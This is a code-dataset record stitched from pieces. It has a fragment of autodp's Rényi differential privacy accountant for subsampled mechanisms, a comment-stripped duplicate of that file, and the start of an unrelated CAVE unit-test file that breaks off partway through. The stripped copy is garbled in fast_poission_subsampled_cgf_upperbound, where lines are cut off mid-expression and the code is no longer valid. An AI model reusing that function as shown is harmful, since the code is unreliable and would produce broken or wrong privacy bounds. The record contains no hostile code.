epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob)
if np.isinf(x):
return epsinf
if prob == 1.0:
return func(x)
if (x >= 1.0) and (x <= 2.0):
return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1))
if np.equal(np.mod(x, 1), 0):
return np.minimum(epsinf, subsample_func_int(x) / (x-1) )
xc = math.ceil(x)
xf = math.floor(x)
return np.minimum(
epsinf,
((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1)
)
# book keeping
self.idxhash[(func, prob)] = self.n # save the index
self.n += 1 # increment the number of unique mechanisms
self.coeffs.append(coeff) # Update the coefficient
self.RDPs.append(subsample_func) # update the analytical functions
# also update the integer results up to m_max.
if (func,prob) in self.cache:
results = self.cache[(func,prob)]
else:
results = np.zeros_like(self.RDPs_int, float)
# m = np.max(self.lambs)
mm = np.max(self.alphas)
for alpha in range(2, mm+1):
results[alpha-1] = subsample_func(alpha)
results[0] = results[1] # Provide the trivial upper bound of RDP at alpha = 1 --- the KL privacy.
self.cache[(func,prob)] = results # save in cache
self.RDPs_int += results * coeff
# update the pure DP
eps, delta = subsample_epsdelta(func(np.inf), 0, prob)
self.RDP_inf += eps * coeff
# mm = np.max(self.alphas)
#
# jvec = np.arange(2, mm+1) #
# logterm3plus = np.zeros_like(results)
# for j in jvec:
# logterm3plus[j-2] = (np.minimum(np.minimum(j * np.log(np.exp(func(np.inf)) - 1)
# + np.minimum(np.log(4),cgf(j-1)), np.log(2) + cgf(j-1)),
# np.log(4) + 0.5 * deltas[int(2 * np.floor(j / 2.0))-1]
# + 0.5 * deltas[int(2 * np.ceil(j / 2.0))-1])
# + j * np.log(prob))
#
# for alpha in range(2, mm+1):
# if np.isinf(logterm3plus[alpha-1]):
# results[alpha-1] = np.inf
# else:
# tmp = utils.stable_logsumexp(logterm3plus[0:alpha-1] + self.logBinomC[alpha, 2:(alpha+1)])
# results[alpha-1] = utils.stable_logsumexp_two(0, tmp) / (1.0*alpha-1)
#
# results[0] = results[1] # Provide the trivial upper bound of RDP at alpha = 1 --- the KL privacy.
#
# self.cache[(func,prob)] = results # save in cache
# self.RDPs_int += results
#
# # For debugging: The following 'results1' should be the same as 'results' above.
# # results1 = np.zeros_like(self.RDPs_int, float)
# # for j in range(self.m):
# # results1[j] = subsample_func(j+1)
#
# eps, delta = subsample_epsdelta(func(np.inf), 0, prob)
# self.RDP_inf += eps
def compose_poisson_subsampled_mechanisms(self, func, prob, coeff=1.0):
# This function implements the lower bound for subsampled RDP.
# It is also the exact formula of poission_subsampled RDP for many mechanisms including Gaussian mech.
#
# At the moment, we do not support mixing poisson subsampling and standard subsampling.
# TODO: modify the caching identifies so that we can distinguish different types of subsampling
#
self.flag = False
self.flag_subsample = True
if (func, prob) in self.idxhash:
idx = self.idxhash[(func, prob)] # TODO: this is really where it needs to be changed.
# update the coefficients of each function
self.coeffs[idx] += coeff
# also update the integer CGFs
self.RDPs_int += self.cache[(func, prob)] * coeff
else: # compute an easy to compute upper bound of it.
def cgf(x):
return x * func(x+1)
def subsample_func_int(x):
# This function evaluates teh CGF at alpha = x, i.e., lamb = x- 1
if np.isinf(func(x)):
return np.inf
mm = int(x)
#
fastbound = fast_poission_subsampled_cgf_upperbound(func, mm, prob)
k = self.alphas[-1]
fastbound_k = fast_k_subsample_upperbound(func, mm, prob,k)
if self.approx == True:
return fastbound_k
#fastbound = min(fastbound, fastbound_k)
if x <= self.alphas[-1]: # compute the bound exactly.
moments = [cgf(j-1) +j*np.log(prob) + (mm-j) * np.log(1-prob)
+ self.logBinomC[mm, j] for j in range(2,mm+1,1)]
return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments)
elif mm <= self.m_lin_max:
moments = [cgf(j-1) +j*np.log(prob) + (mm-j) * np.log(1-prob)
+ utils.logcomb(mm,j) for j in range(2,mm+1,1)]
return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)] + moments)
else:
return fastbound
def subsample_func(x): # linear interpolation upper bound
# This function implements the RDP at alpha = x
if np.isinf(func(x)):
return np.inf
if prob == 1.0:
return func(x)
epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob)
if np.isinf(x):
return epsinf
if (x >= 1.0) and (x <= 2.0):
return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1))
if np.equal(np.mod(x, 1), 0):
return np.minimum(epsinf, subsample_func_int(x) / (x-1) )
xc = math.ceil(x)
xf = math.floor(x)
return np.minimum(
epsinf,
((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1)
)
# book keeping
self.idxhash[(func, prob)] = self.n # save the index
self.n += 1 # increment the number of unique mechanisms
self.coeffs.append(coeff) # Update the coefficient
self.RDPs.append(subsample_func) # update the analytical functions
# also update the integer results, with a vectorized computation.
# TODO: pre-computing subsampled RDP for integers is error-prone (implement the same thing twice)
# TODO: and its benefits are not clear. We should consider removing it and simply call the lambda function.
#
if (func,prob) in self.cache:
results = self.cache[(func,prob)]
else:
results = np.zeros_like(self.RDPs_int, float)
mm = np.max(self.alphas) # evaluate the RDP up to order mm
jvec = np.arange(2, mm + 1)
logterm3plus = np.zeros_like(results) # This saves everything from j=2 to j = m+1
for j in jvec:
logterm3plus[j-2] = cgf(j-1) + j * np.log(prob) #- np.log(1-prob))
for alpha in range(2, mm+1):
if np.isinf(logterm3plus[alpha-1]):
results[alpha-1] = np.inf
else:
tmp = utils.stable_logsumexp(logterm3plus[0:alpha-1] + self.logBinomC[alpha , 2:(alpha + 1)]
+ (alpha+1-jvec[0:alpha-1])*np.log(1-prob))
results[alpha-1] = utils.stable_logsumexp_two((alpha-1)*np.log(1-prob)
+ np.log(1+(alpha-1)*prob), tmp) / (1.0*alpha-1)
results[0] = results[1] # Provide the trivial upper bound of RDP at alpha = 1 --- the KL privacy.
self.cache[(func,prob)] = results # save in cache
self.RDPs_int += results * coeff
# update the pure DP tracker
eps, delta = subsample_epsdelta(func(np.inf), 0, prob)
self.RDP_inf += eps * coeff
def compose_poisson_subsampled_mechanisms1(self, func, prob, coeff=1.0):
# This function implements the general amplification bounds for Poisson sampling.
# No additional assumptions are needed.
# At the moment, we do not support mixing poisson subsampling and standard subsampling.
#
self.flag = False
self.flag_subsample = True
if (func, prob) in self.idxhash:
idx = self.idxhash[(func, prob)]
# update the coefficients of each function
self.coeffs[idx] += coeff
# also update the integer CGFs
self.RDPs_int += self.cache[(func, prob)] * coeff
else: # compute an easy to compute upper bound of it.
cgf = lambda x: x*func(x+1)
def subsample_func_int(x):
# This function evaluates the CGF at alpha = x, i.e., lamb = x- 1
if np.isinf(func(x)):
return np.inf
if prob == 1.0:
return func(x)
mm = int(x)
fastbound = fast_poission_subsampled_cgf_upperbound(func, mm, prob)
if x <= self.alphas[-1]: # compute the bound exactly.
moments = [cgf(1) + 2*np.log(prob) + (mm-2) * np.log(1 - prob) + self.logBinomC[mm, 2]]
moments = moments + [cgf(j-1+1) +j*np.log(prob) + (mm-j) * np.log(1 - prob)
+ self.logBinomC[mm, j] for j in range(3,mm+1,1)]
return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments)
elif mm <= self.m_lin_max:
moments = [cgf(1) + 2*np.log(prob) + (mm-2) * np.log(1 - prob) + utils.logcomb(mm, 2)]
moments = moments + [cgf(j-1+1) +j*np.log(prob) + (mm-j) * np.log(1 - prob)
+ utils.logcomb(mm, j) for j in range(3,mm+1,1)]
return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments)
else:
return fastbound
def subsample_func(x): # linear interpolation upper bound
epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob)
if np.isinf(x):
return epsinf
if (x >= 1.0) and (x <= 2.0):
return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1))
if np.equal(np.mod(x, 1), 0):
return np.minimum(epsinf, subsample_func_int(x) / (x-1) )
xc = math.ceil(x)
xf = math.floor(x)
return np.minimum(
epsinf,
((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1)
)
# book keeping
self.idxhash[(func, prob)] = self.n # save the index
self.n += 1 # increment the number of unique mechanisms
self.coeffs.append(coeff) # Update the coefficient
self.RDPs.append(subsample_func) # update the analytical functions
# also update the integer results
if (func,prob) in self.cache:
results = self.cache[(func,prob)]
else:
results = np.zeros_like(self.RDPs_int, float)
mm = np.max(self.alphas) # evaluate the RDP up to order mm
for alpha in range(2, mm+1):
results[alpha-1] = subsample_func_int(alpha)
results[0] = results[1] # Provide the trivial upper bound of RDP at alpha = 1 --- the KL privacy.
self.cache[(func,prob)] = results # save in cache
self.RDPs_int += results * coeff
# update the pure DP tracker
eps, delta = subsample_epsdelta(func(np.inf), 0, prob)
self.RDP_inf += eps * coeff
# TODO: 1. Modularize the several Poission sampling versions. 2. Support both sampling schemes together.
| 44.658473
| 125
| 0.534312
|
import numpy as np
from scipy.optimize import minimize_scalar
import sys
sys.path.append('..')
import autodp
from autodp import utils, rdp_bank
from autodp.privacy_calibrator import subsample_epsdelta
import scipy
import math
def general_upperbound(func, mm, prob):
def cgf(x):
return (x - 1) * func(x)
if np.isinf(func(mm)):
return np.inf
if mm == 1 or mm == 0:
return 0
cur_k = np.minimum(50, mm - 1)
log_term_1 = mm * np.log(1 - prob)
log_term_2 = np.log(3) - func(mm) + mm * utils.stable_logsumexp_two(np.log(1 - prob), np.log(prob) + func(mm))
neg_term_3 = [np.log(scipy.special.comb(mm,l)) + np.log(3) + (mm - l) * np.log(1 - prob) + l * np.log(prob) +
utils.stable_log_diff_exp((l - 1) * func(mm), cgf(l))[1] for l in
range(3, cur_k + 1)]
neg_term_4 = np.log(mm*(mm - 1)/2) + 2 * np.log(prob) + (mm - 2) * np.log(
1 - prob) + utils.stable_log_diff_exp(np.log(3) + func(mm), func(2))[1]
neg_term_5 = np.log(2) + np.log(prob) + np.log(mm) + (mm - 1) * np.log(1 - prob)
neg_term_6 = mm * np.log(1 - prob) + np.log(3) - func(mm)
pos_term = utils.stable_logsumexp([log_term_1, log_term_2])
neg_term_3.append(neg_term_4)
neg_term_3.append(neg_term_5)
neg_term_3.append(neg_term_6)
neg_term = utils.stable_logsumexp(neg_term_3)
bound = utils.stable_log_diff_exp(pos_term, neg_term)[1]
return bound
def fast_subsampled_cgf_upperbound(func, mm, prob, deltas_local):
return np.inf
if np.isinf(func(mm)):
return np.inf
if mm == 1:
return 0
secondterm = np.minimum(np.minimum((2) * np.log(np.exp(func(np.inf)) - 1)
+ np.minimum(func(2), np.log(4)),
np.log(2) + func(2)),
np.log(4) + 0.5 * deltas_local[int(2 * np.floor(2 / 2.0)) - 1]
+ 0.5 * deltas_local[int(2 * np.ceil(2 / 2.0)) - 1]
) + 2 * np.log(prob) + np.log(mm) + np.log(mm - 1) - np.log(2)
if mm == 2:
return utils.stable_logsumexp([0, secondterm])
logratio1 = np.log(prob) + np.log(mm) + func(mm)
logratio2 = logratio1 + np.log(np.exp(func(np.inf)) - 1)
logratio = np.minimum(logratio1, logratio2)
if logratio1 > logratio2:
coeff = 1
else:
coeff = 2
if mm == 3:
return utils.stable_logsumexp([0, secondterm, np.log(coeff) + 3 * logratio])
if logratio < 0:
geometric_series_bound = np.log(coeff) + 3 * logratio - np.log(1 - np.exp(logratio)) \
+ np.log(1 - np.exp((mm - 2) * logratio))
elif logratio > 0:
geometric_series_bound = np.log(coeff) + 3 * logratio + (mm-2) * logratio - np.log(np.exp(logratio) - 1)
else:
geometric_series_bound = np.log(coeff) + np.log(mm - 2)
logh1 = np.log(prob) + func(mm - 1)
logh2 = logh1 + np.log(np.exp(func(np.inf)) - 1)
binomial_series_bound1 = np.log(2) + mm * utils.stable_logsumexp_two(0, logh1)
binomial_series_bound2 = mm * utils.stable_logsumexp_two(0, logh2)
tmpsign, binomial_series_bound1 \
= utils.stable_sum_signed(True, binomial_series_bound1, False, np.log(2)
+ utils.stable_logsumexp([0, logh1 + np.log(mm), 2 * logh1 + np.log(mm)
+ np.log(mm - 1) - np.log(2)]))
tmpsign, binomial_series_bound2 \
= utils.stable_sum_signed(True, binomial_series_bound2, False,
utils.stable_logsumexp([0, logh2 + np.log(mm), 2 * logh2 + np.log(mm)
+ np.log(mm - 1) - np.log(2)]))
remainder = np.min([geometric_series_bound, binomial_series_bound1, binomial_series_bound2])
return utils.stable_logsumexp([0, secondterm, remainder])
def fast_poission_subsampled_cgf_upperbound(func, mm, prob):
if np.isinf(func(mm)):
return np.inf
if mm == 1:
return 0
.log(1-prob), np.log(prob) + func(mm))
mexp([mm * np.log(1-prob), (mm-1) * np.log(1-prob) + np.log(mm) + np.log(prob),
(mm-2)*np.log(1-prob) + 2 * np.log(prob) + np.log(mm) + np.log(mm-1) + func(2),
np.log(mm) + np.log(mm-1) + np.log(mm-2) - np.log(3*2) + 3 * np.log(prob)
+ (mm-3)*np.log(1-prob) + 2 * func(mm) +
(mm-3) * utils.stable_logsumexp_two(0, np.log(prob) - np.log(1-prob) + func(mm))])
else:
bound2 = bound1
return np.minimum(bound1,bound2)
def fast_k_subsample_upperbound(func, mm, prob, k):
def cgf(x):
return (x - 1) * func(x)
if np.isinf(func(mm)):
return np.inf
if mm == 1:
return 0
cur_k = np.minimum(k, mm - 1)
if (2 * cur_k) >= mm:
exact_term_1 = (mm - 1) * np.log(1 - prob) + np.log(mm * prob - prob + 1)
exact_term_2 = [np.log(scipy.special.comb(mm,l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) + cgf(l) for l in
range(2, mm + 1)]
exact_term_2.append(exact_term_1)
bound = utils.stable_logsumexp(exact_term_2)
return bound
s, mag1 = utils.stable_log_diff_exp(0, -func(mm - cur_k))
new_log_term_1 = np.log(1 - prob) * mm + mag1
new_log_term_2 = -func(mm - cur_k) + mm * utils.stable_logsumexp_two(np.log(1 - prob),
np.log(prob) + func(mm - cur_k))
new_log_term_3 = [np.log(scipy.special.comb(mm,l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) +
utils.stable_log_diff_exp((l - 1) * func(mm - cur_k), cgf(l))[1] for l in
range(2, cur_k + 1)]
if len(new_log_term_3) > 0:
new_log_term_3 = utils.stable_logsumexp(new_log_term_3)
else:
return utils.stable_logsumexp_two(new_log_term_1, new_log_term_2)
new_log_term_4 = [np.log(scipy.special.comb(mm,mm-l)) + (mm - l) * np.log(1 - prob) + l * np.log(prob) +
utils.stable_log_diff_exp(cgf(l), (l - 1) * func(mm - cur_k))[1] for l in
range(mm - cur_k + 1, mm + 1)]
new_log_term_4.append(new_log_term_1)
new_log_term_4.append(new_log_term_2)
new_log_term_4 = utils.stable_logsumexp(new_log_term_4)
s, new_log_term_5 = utils.stable_log_diff_exp(new_log_term_4, new_log_term_3)
new_bound = new_log_term_5
return new_bound
class anaRDPacct:
def __init__(self, m=100, tol=0.1, m_max=500, m_lin_max=10000, approx = False, verbose=False):
self.m = m
self.m_max = m_max
self.m_lin_max = m_lin_max
self.verbose = verbose
self.approx = approx
self.lambs = np.linspace(1, self.m, self.m).astype(int)
self.alphas = np.linspace(1, self.m, self.m).astype(int)
self.RDPs_int = np.zeros_like(self.alphas, float)
self.n=0
self.RDPs = []
self.coeffs = []
self.RDP_inf = .0
self.logBinomC = utils.get_binom_coeffs(self.m + 1)
self.idxhash = {}
self.cache = {}
self.deltas_cache = {}
self.evalRDP = lambda x: 0
self.flag = True
self.flag_subsample = False
self.tol = tol
def build_zeroth_oracle(self):
self.evalRDP = lambda x: sum([c * item(x) for (c, item) in zip(self.coeffs, self.RDPs)])
def plot_rdp(self):
if not self.flag:
self.build_zeroth_oracle()
self.flag = True
import matplotlib.pyplot as plt
plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')
x = range(0,self.m,1)
y = [self.evalRDP(item) for item in x]
plt.loglog(x, y)
plt.show()
def plot_cgf_int(self):
import matplotlib.pyplot as plt
plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')
plt.plot(self.alphas, self.RDPs_int)
plt.xlabel(r'$\lambda$')
plt.ylabel('CGF')
plt.show()
def plot_rdp_int(self):
import matplotlib.pyplot as plt
plt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')
plt.loglog(self.alphas, self.RDPs_int)
if not self.flag:
self.build_zeroth_oracle()
self.flag = True
x = range(1,self.m_lin_max,1)
y = [self.evalRDP(item) for item in x]
plt.loglog(x, y)
plt.xlabel(r'$\alpha$')
plt.ylabel(r'RDP $\epsilon$')
plt.show()
def get_rdp(self,alphas):
if not self.flag:
self.build_zeroth_oracle()
self.flag = True
alphas = np.array(alphas)
assert(np.all(alphas >= 1))
rdp_list = []
for alpha in alphas:
rdp_list.append(self.evalRDP(alpha))
return np.array(rdp_list)
def get_eps(self, delta):
if not self.flag:
self.build_zeroth_oracle()
self.flag = True
if delta<0 or delta > 1:
print("Error! delta is a probability and must be between 0 and 1")
if delta == 0:
return self.RDP_inf
else:
def fun(x):
if x <= 1:
return np.inf
else:
return np.log(1 / delta)/(x-1) + self.evalRDP(x)
def fun_int(i): # the input is RDP's \alpha in integer
if i <= 1 | i >= len(self.RDPs_int):
return np.inf
else:
return np.log(1 / delta) / (i-1) + self.RDPs_int[i - 1]
while (self.m<self.m_max) and (not np.isposinf(fun(self.m))) and (fun_int(self.m-1)-fun_int(self.m-2) < 0):
if self.flag_subsample:
self.logBinomC = utils.get_binom_coeffs(self.m*2+1)
for key, val in self.deltas_cache.items():
if type(key) is tuple:
func_tmp = key[0]
else:
func_tmp = key
cgf = lambda x: x*func_tmp(x+1)
deltas,signs_deltas = utils.get_forward_diffs(cgf,self.m*2)
self.deltas_cache[key] = [deltas, signs_deltas]
new_alphas = range(self.m + 1, self.m * 2 + 1, 1)
self.alphas = np.concatenate((self.alphas, np.array(new_alphas)))
self.m = self.m * 2
mm = np.max(self.alphas)
rdp_int_new = np.zeros_like(self.alphas, float)
for key,val in self.cache.items():
idx = self.idxhash[key]
rdp = self.RDPs[idx]
newarray = np.zeros_like(self.alphas, float)
for j in range(2,mm+1,1):
newarray[j-1] = rdp(1.0*j)
newarray[0]=newarray[1]
coeff = self.coeffs[idx]
rdp_int_new += newarray * coeff
self.cache[key] = newarray
self.RDPs_int = rdp_int_new
bestint = np.argmin(np.log(1 / delta)/(self.alphas[1:]-1) + self.RDPs_int[1:]) + 1
if bestint == self.m-1:
if self.verbose:
print('Warning: Reach quadratic upper bound: m_max.')
cur = fun(bestint)
while (not np.isposinf(cur)) and fun(bestint-1)-fun(bestint-2) < -1e-8:
bestint = bestint*2
cur = fun(bestint)
if bestint > self.m_lin_max and self.approx ==True:
print('Warning: Reach linear upper bound: m_lin_max.')
return cur
results = minimize_scalar(fun, method='Bounded', bounds=[self.m-1, bestint + 2],
options={'disp': False})
if results.success:
return results.fun
else:
return None
if bestint == 0:
if self.verbose:
print('Warning: Smallest alpha = 1.')
bestalpha = self.alphas[bestint]
results = minimize_scalar(fun, method='Bounded',bounds=[bestalpha-1, bestalpha+1],
options={'disp':False})
if results.success:
return results.fun
else:
return -1
def compose_mechanism(self, func, coeff=1.0):
self.flag = False
if func in self.idxhash:
self.coeffs[self.idxhash[func]] += coeff
self.RDPs_int += self.cache[func] * coeff
else:
self.idxhash[func] = self.n
self.n += 1
self.coeffs.append(coeff)
self.RDPs.append(func)
if func in self.cache:
tmp = self.cache[func]
else:
tmp = np.zeros_like(self.RDPs_int, float)
for i in range(self.m):
tmp[i] = func(i+1)
self.cache[func] = tmp
self.RDPs_int += tmp * coeff
self.RDP_inf += func(np.inf) * coeff
def compose_subsampled_mechanism(self, func, prob, coeff=1.0):
self.flag = False
self.flag_subsample = True
if (func, prob) in self.idxhash:
idx = self.idxhash[(func, prob)]
self.coeffs[idx] += coeff
self.RDPs_int += self.cache[(func, prob)] * coeff
else:
def cgf(x):
return x * func(x+1)
deltas, signs_deltas = utils.get_forward_diffs(cgf,self.m)
self.deltas_cache[(func,prob)] = [deltas,signs_deltas]
def subsample_func_int(x):
deltas_local, signs_deltas_local = self.deltas_cache[(func,prob)]
if np.isinf(func(x)):
return np.inf
mm = int(x)
fastupperbound = fast_subsampled_cgf_upperbound(func, mm, prob, deltas_local)
fastupperbound2 = general_upperbound(func, mm, prob)
if self.approx ==True:
if fastupperbound2 <0:
print('general rdp is negative',x)
return fastupperbound2
if mm <= self.alphas[-1]:
moments = [ np.minimum(np.minimum((j)*np.log(np.exp(func(np.inf))-1) + np.minimum(cgf(j-1),np.log(4)),
np.log(2) + cgf(j-1)),
np.log(4) + 0.5*deltas_local[int(2*np.floor(j/2.0))-1]
+ 0.5*deltas_local[int(2*np.ceil(j/2.0))-1]) + j*np.log(prob)
+self.logBinomC[int(mm), j] for j in range(2,int(mm+1),1)]
return np.minimum(fastupperbound, utils.stable_logsumexp([0]+moments))
elif mm <= self.m_lin_max:
moment_bound = lambda j: np.minimum(j * np.log(np.exp(func(np.inf)) - 1)
+ np.minimum(cgf(j - 1), np.log(4)), np.log(2)
+ cgf(j - 1)) + j * np.log(prob) + utils.logcomb(mm, j)
moments = [moment_bound(j) for j in range(2,mm+1,1)]
return np.minimum(fastupperbound, utils.stable_logsumexp([0]+ moments))
else:
return fastupperbound
def subsample_func(x):
epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob)
if np.isinf(x):
return epsinf
if prob == 1.0:
return func(x)
if (x >= 1.0) and (x <= 2.0):
return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1))
if np.equal(np.mod(x, 1), 0):
return np.minimum(epsinf, subsample_func_int(x) / (x-1) )
xc = math.ceil(x)
xf = math.floor(x)
return np.minimum(
epsinf,
((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1)
)
self.idxhash[(func, prob)] = self.n
self.n += 1
self.coeffs.append(coeff)
self.RDPs.append(subsample_func)
if (func,prob) in self.cache:
results = self.cache[(func,prob)]
else:
results = np.zeros_like(self.RDPs_int, float)
mm = np.max(self.alphas)
for alpha in range(2, mm+1):
results[alpha-1] = subsample_func(alpha)
results[0] = results[1]
self.cache[(func,prob)] = results
self.RDPs_int += results * coeff
eps, delta = subsample_epsdelta(func(np.inf), 0, prob)
self.RDP_inf += eps * coeff
self.flag = False
self.flag_subsample = True
if (func, prob) in self.idxhash:
idx = self.idxhash[(func, prob)]
self.coeffs[idx] += coeff
self.RDPs_int += self.cache[(func, prob)] * coeff
else:
def cgf(x):
return x * func(x+1)
def subsample_func_int(x):
if np.isinf(func(x)):
return np.inf
mm = int(x)
fastbound = fast_poission_subsampled_cgf_upperbound(func, mm, prob)
k = self.alphas[-1]
fastbound_k = fast_k_subsample_upperbound(func, mm, prob,k)
if self.approx == True:
return fastbound_k
if x <= self.alphas[-1]:
moments = [cgf(j-1) +j*np.log(prob) + (mm-j) * np.log(1-prob)
+ self.logBinomC[mm, j] for j in range(2,mm+1,1)]
return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments)
elif mm <= self.m_lin_max:
moments = [cgf(j-1) +j*np.log(prob) + (mm-j) * np.log(1-prob)
+ utils.logcomb(mm,j) for j in range(2,mm+1,1)]
return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)] + moments)
else:
return fastbound
def subsample_func(x):
if np.isinf(func(x)):
return np.inf
if prob == 1.0:
return func(x)
epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob)
if np.isinf(x):
return epsinf
if (x >= 1.0) and (x <= 2.0):
return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1))
if np.equal(np.mod(x, 1), 0):
return np.minimum(epsinf, subsample_func_int(x) / (x-1) )
xc = math.ceil(x)
xf = math.floor(x)
return np.minimum(
epsinf,
((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1)
)
self.idxhash[(func, prob)] = self.n
self.n += 1
self.coeffs.append(coeff)
self.RDPs.append(subsample_func)
if (func,prob) in self.cache:
results = self.cache[(func,prob)]
else:
results = np.zeros_like(self.RDPs_int, float)
mm = np.max(self.alphas)
jvec = np.arange(2, mm + 1)
logterm3plus = np.zeros_like(results)
for j in jvec:
logterm3plus[j-2] = cgf(j-1) + j * np.log(prob)
for alpha in range(2, mm+1):
if np.isinf(logterm3plus[alpha-1]):
results[alpha-1] = np.inf
else:
tmp = utils.stable_logsumexp(logterm3plus[0:alpha-1] + self.logBinomC[alpha , 2:(alpha + 1)]
+ (alpha+1-jvec[0:alpha-1])*np.log(1-prob))
results[alpha-1] = utils.stable_logsumexp_two((alpha-1)*np.log(1-prob)
+ np.log(1+(alpha-1)*prob), tmp) / (1.0*alpha-1)
results[0] = results[1]
self.cache[(func,prob)] = results
self.RDPs_int += results * coeff
eps, delta = subsample_epsdelta(func(np.inf), 0, prob)
self.RDP_inf += eps * coeff
def compose_poisson_subsampled_mechanisms1(self, func, prob, coeff=1.0):
self.flag = False
self.flag_subsample = True
if (func, prob) in self.idxhash:
idx = self.idxhash[(func, prob)]
self.coeffs[idx] += coeff
self.RDPs_int += self.cache[(func, prob)] * coeff
else:
cgf = lambda x: x*func(x+1)
def subsample_func_int(x):
if np.isinf(func(x)):
return np.inf
if prob == 1.0:
return func(x)
mm = int(x)
fastbound = fast_poission_subsampled_cgf_upperbound(func, mm, prob)
if x <= self.alphas[-1]:
moments = [cgf(1) + 2*np.log(prob) + (mm-2) * np.log(1 - prob) + self.logBinomC[mm, 2]]
moments = moments + [cgf(j-1+1) +j*np.log(prob) + (mm-j) * np.log(1 - prob)
+ self.logBinomC[mm, j] for j in range(3,mm+1,1)]
return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments)
elif mm <= self.m_lin_max:
moments = [cgf(1) + 2*np.log(prob) + (mm-2) * np.log(1 - prob) + utils.logcomb(mm, 2)]
moments = moments + [cgf(j-1+1) +j*np.log(prob) + (mm-j) * np.log(1 - prob)
+ utils.logcomb(mm, j) for j in range(3,mm+1,1)]
return utils.stable_logsumexp([(mm-1)*np.log(1-prob)+np.log(1+(mm-1)*prob)]+moments)
else:
return fastbound
def subsample_func(x):
epsinf, tmp = subsample_epsdelta(func(np.inf),0,prob)
if np.isinf(x):
return epsinf
if (x >= 1.0) and (x <= 2.0):
return np.minimum(epsinf, subsample_func_int(2.0) / (2.0-1))
if np.equal(np.mod(x, 1), 0):
return np.minimum(epsinf, subsample_func_int(x) / (x-1) )
xc = math.ceil(x)
xf = math.floor(x)
return np.minimum(
epsinf,
((x-xf)*subsample_func_int(xc) + (1-(x-xf))*subsample_func_int(xf)) / (x-1)
)
self.idxhash[(func, prob)] = self.n
self.n += 1
self.coeffs.append(coeff)
self.RDPs.append(subsample_func)
if (func,prob) in self.cache:
results = self.cache[(func,prob)]
else:
results = np.zeros_like(self.RDPs_int, float)
mm = np.max(self.alphas)
for alpha in range(2, mm+1):
results[alpha-1] = subsample_func_int(alpha)
results[0] = results[1]
self.cache[(func,prob)] = results
self.RDPs_int += results * coeff
eps, delta = subsample_epsdelta(func(np.inf), 0, prob)
self.RDP_inf += eps * coeff
| true
| true
|
f705c04fa8bb30cc2be892362cc4af89d3328301
| 1,297
|
py
|
Python
|
test/test_utils/test_statistical_tests.py
|
deslay1/CAVE
|
e4b9abc3812034f49dddd27ffc17dbab39782a1c
|
[
"BSD-3-Clause"
] | 45
|
2018-01-11T11:26:11.000Z
|
2021-06-22T06:14:39.000Z
|
test/test_utils/test_statistical_tests.py
|
deslay1/CAVE
|
e4b9abc3812034f49dddd27ffc17dbab39782a1c
|
[
"BSD-3-Clause"
] | 150
|
2017-12-20T16:14:45.000Z
|
2021-09-28T11:26:33.000Z
|
test/test_utils/test_statistical_tests.py
|
automl/SpySMAC
|
afcbecd0b9cb97276625c16a89cb6df141e6f6f2
|
[
"BSD-3-Clause"
] | 17
|
2018-03-17T04:46:09.000Z
|
2021-02-18T18:31:38.000Z
|
import logging
import unittest
import numpy as np
from cave.utils.statistical_tests import paired_permutation, paired_t_student
class TestStatisticalTests(unittest.TestCase):
def setUp(self):
self.logger = logging.getLogger("TestStatisticalTests")
def test_paired_permutation(self):
""" Testing paired permutation test. """
rng = np.random.RandomState(42)
a, b = rng.normal(loc=0, size=100), rng.normal(loc=0, size=100)
result = paired_permutation(a, a, rng, 100, self.logger)
self.assertGreater(result, 0.9999)
result = paired_permutation(a, b, rng, 100, self.logger)
self.assertGreater(result, 0.3)
a, b = rng.normal(loc=-1, size=100), rng.normal(loc=1, size=100)
result = paired_permutation(a, b, rng, 1000, self.logger)
self.assertLess(result, 0.001)
def test_t_student(self):
""" Testing paired t-test. """
rng = np.random.RandomState(42)
a, b = rng.normal(loc=0, size=100), rng.normal(loc=0, size=100)
result = paired_t_student(a, b, self.logger)
self.assertGreater(result, 0.3)
a, b = rng.normal(loc=-1, size=100), rng.normal(loc=1, size=100)
result = paired_t_student(a, b, self.logger)
self.assertLess(result, 0.001)
| 37.057143
| 77
| 0.651503
|
import logging
import unittest
import numpy as np
from cave.utils.statistical_tests import paired_permutation, paired_t_student
class TestStatisticalTests(unittest.TestCase):
def setUp(self):
self.logger = logging.getLogger("TestStatisticalTests")
def test_paired_permutation(self):
rng = np.random.RandomState(42)
a, b = rng.normal(loc=0, size=100), rng.normal(loc=0, size=100)
result = paired_permutation(a, a, rng, 100, self.logger)
self.assertGreater(result, 0.9999)
result = paired_permutation(a, b, rng, 100, self.logger)
self.assertGreater(result, 0.3)
a, b = rng.normal(loc=-1, size=100), rng.normal(loc=1, size=100)
result = paired_permutation(a, b, rng, 1000, self.logger)
